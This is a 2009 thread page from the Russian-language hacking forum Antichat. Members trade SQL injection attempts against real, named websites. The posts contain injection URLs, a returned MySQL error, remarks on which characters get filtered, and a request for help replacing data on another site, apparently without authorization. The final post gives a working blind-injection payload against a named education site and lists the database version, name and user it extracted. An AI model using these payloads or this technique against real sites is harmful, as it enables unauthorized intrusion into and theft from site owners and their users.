ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5651  
Старый 24.02.2009, 05:48
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию

Цитата:
Сообщение от l1ght  
у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):


/add

имхо в запрос попадает &apos (в html &apos а при просмотре ')
Дело в том что выше постами было установлено, что апостроф фильтруется, а как я говорил ' это сделано для того, что бы красиво было глазам смотреть на "удавшийся" инъект. Вообще спасибо тебе за помощь, но ничего сделать нельзя так как апостроф нужно в любом случаю, что бы удовлетворить логику запроса
 
Ответить с цитированием

  #5652  
Старый 24.02.2009, 06:31
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

непонятная скуля.. да еще и сайт не быстр принайме у меня..
Цитата:
http://www.whimit.com/forum_read.php?f=17э&id=75739'
а как у вас? )
 
Ответить с цитированием

  #5653  
Старый 24.02.2009, 09:57
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.whimit.com/forum_read.php?f=17
Invalid query: db_query - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and g.id=gb.id order by g.id' at line 1

А больше хрен че добьешся... Все фильтрует че только можно даже group by или внатуре фиг поймешь..
 
Ответить с цитированием

  #5654  
Старый 24.02.2009, 10:17
*eXe*
Banned
Регистрация: 20.05.2008
Сообщений: 281
Провел на форуме:
3200135

Репутация: 575
Отправить сообщение для *eXe* с помощью ICQ
По умолчанию

__www.dpstyle.com.ua
не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл. Где они вообще могут быть?
 
Ответить с цитированием

  #5655  
Старый 24.02.2009, 15:20
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Нужен php-скрипт для удобной работы с базой оракл через веб-интерфейс. Т.е. что-то вроде rst-sql.php или phpmyadmin, но для Oracle.
 
Ответить с цитированием

  #5656  
Старый 24.02.2009, 15:38
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

budden, этот вопрос не для раздела уязвимости!
 
Ответить с цитированием

  #5657  
Старый 24.02.2009, 16:21
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

вообще сайт бажный какой-то

1. Там с нормальными параметрами не работает:

Код:
http://www.whimit.com/forum_read.php?f=17&id=75739
2.
Код:
http://www.whimit.com/album_list.php?username=inmate051877lol
 
Ответить с цитированием

  #5658  
Старый 24.02.2009, 17:23
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от *eXe*  
__www.dpstyle.com.ua
не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл.
В админке смотрел?

Цитата:
Где они вообще могут быть?
В БД


Цитата:
Нужен php-скрипт для удобной работы с базой оракл через веб-интерфейс. Т.е. что-то вроде rst-sql.php или phpmyadmin, но для Oracle
phpOracleAdmin - ищи в гугле
 
Ответить с цитированием

  #5659  
Старый 24.02.2009, 19:14
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

http://lit.1september.ru/urok/index.php?SubjectID=100010'

Помогите, вроде скуля, а не крутится...
 
Ответить с цитированием

  #5660  
Старый 24.02.2009, 19:23
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 wildshaman


http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((se lect+user()),18,1))=x


я нашел слепухy

Version : 5.1.30-log
Database : dblit
User : webuser@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ